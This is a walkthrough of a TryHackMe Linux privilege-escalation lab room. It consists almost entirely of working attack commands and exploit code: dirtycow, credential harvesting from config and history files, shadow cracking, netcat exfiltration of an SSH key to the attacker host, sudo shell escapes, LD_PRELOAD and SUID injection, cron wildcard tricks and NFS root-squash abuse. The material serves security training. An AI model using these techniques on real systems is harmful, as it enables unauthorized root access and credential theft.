Linux PrivEsc Arena
Room Link: https://tryhackme.com/room/linuxprivescarena
Privilege Escalation - Kernel Exploits
In command prompt type:
Victim
/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.shFrom the output, notice that the OS is vulnerable to “dirtycow”.
Exploitation
Linux VM
In command prompt type:
Victim
gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0wIn command prompt type:
Victim
./c0wDisclaimer: This part takes 1-2 minutes - Please allow it some time to work.
In command prompt type:
Victim
passwdIn command prompt type:
Victim
id
From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary
Victim
ls -lah /usr/bin/passwd
rm -f /usr/bin/passwd
cp /tmp/bak /usr/bin/passwd
ls -lah /usr/bin/passwd 
Privilege Escalation - Stored Passwords (Config Files)
From the output, make note of the value of the “auth-user-pass” directive.
Victim
cat /home/user/myvpn.ovpn
From the output, make note of the clear-text credentials.
Victim
cat /etc/openvpn/auth.txt 
From the output, make note of the clear-text credentials.
Victim
cat /home/user/.irssi/config | grep -i passw 
Privilege Escalation - Stored Passwords (History)
Victim
cat ~/.bash_history | grep -i passw From the output, make note of the clear-text credentials.
Privilege Escalation - Weak File Permissions
Victim
cat /etc/passwdSave the output to a file on your attacker machine
Victim
cat /etc/shadowSave the output to a file on your attacker machine
Kali
unshadow passwd shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O
Privilege Escalation - SSH Keys
Found nothing for this box
Victim
find / -name authorized_keys 2> /dev/nullVictim
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa
Netcat
Kali(receiving)
nc -l -p 1234 > id_rsaVictim(sending)
nc -w 3 $KALI 1234 < id_rsaKali
chmod 400 id_rsa
ssh -i id_rsa root@$VICTIMPrivilege Escalation - Sudo (Shell Escaping)
Victim
sudo -l
Victim
sudo find /bin -name nano -exec /bin/sh \;
Victim
sudo awk 'BEGIN {system("/bin/sh")}'
Victim
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
Victim
sudo vim -c '!sh'
Privilege Escalation - Sudo (Abusing Intended Functionality)
Victim
sudo -lVictim
sudo apache2 -f /etc/shadow
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john hash.txt --show
Privilege Escalation - Sudo (LD_PRELOAD)
Victim
sudo -lexploit.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}Victim
gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles
sudo LD_PRELOAD=/tmp/exploit.so apache2
Privilege Escalation - SUID (Shared Object Injection)
Victim
find / -type f -perm -04000 -ls 2>/dev/null
Victim
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
Victim
mkdir /home/user/.config
cd /home/user/.config
vi libcalc.clibcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}Victim
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
/usr/local/bin/suid-so
Privilege Escalation - SUID (Symlinks)
Victim #1
dpkg -l | grep nginx
Victim #1
su -l www-dataVictim #1
/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.logVictim #2
invoke-rc.d nginx rotate >/dev/null 2>&1Victim #1
id
Privilege Escalation - SUID (Environment Variables #1)
Detection
Victim
find / -type f -perm -04000 -ls 2>/dev/null
Victim
strings /usr/local/bin/suid-env
Exploitation
Victim
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.cVictim
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-envVictim
id
Privilege Escalation - SUID (Environment Variables #2)
Detection
Victim
find / -type f -perm -04000 -ls 2>/dev/null
Victim
/usr/local/bin/suid-env2Exploitation Method #1
Victim
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }Victim
export -f /usr/sbin/serviceVictim
/usr/local/bin/suid-env2Exploitation Method #2
Victim
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'Privilege Escalation - Capabilities
Victim
getcap -r / 2>/dev/null
Victim
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Privilege Escalation - Cron (Path)
Detection
Victim
cat /etc/crontab
Exploitation
Victim
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.shWait 1 minute for the Bash script to execute.
Victim
/tmp/bash -p
id
Privilege Escalation - Cron (Wildcards)
Detection
From the output, notice the script “/usr/local/bin/compress.sh”
Victim
cat /etc/crontab
Victim
cat /usr/local/bin/compress.sh
Exploitation
Victim
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.shVictim
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.shVictim
/tmp/bash -p
id
Privilege Escalation - Cron (File Overwrite)
Detection
From the output, notice the script “overwrite.sh”
Victim
cat /etc/crontab
From the output, notice the file permissions.
Victim
ls -l /usr/local/bin/overwrite.sh
Exploitation
Victim
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.shWait 1 minute for the Bash script to execute.
Victim
/tmp/bash -p
idPrivilege Escalation - NFS Root Squashing
Detection
From the output, notice that “no_root_squash” option is defined for the “/tmp” export.
Victim
cat /etc/exports
Exploitation
Kali
showmount -e $VICTIM
Kali
mkdir /tmp/1
mount -o rw,vers=2 10.10.26.171:/tmp /tmp/1Kali
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.cKali
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/xVictim
/tmp/x
id
Last updated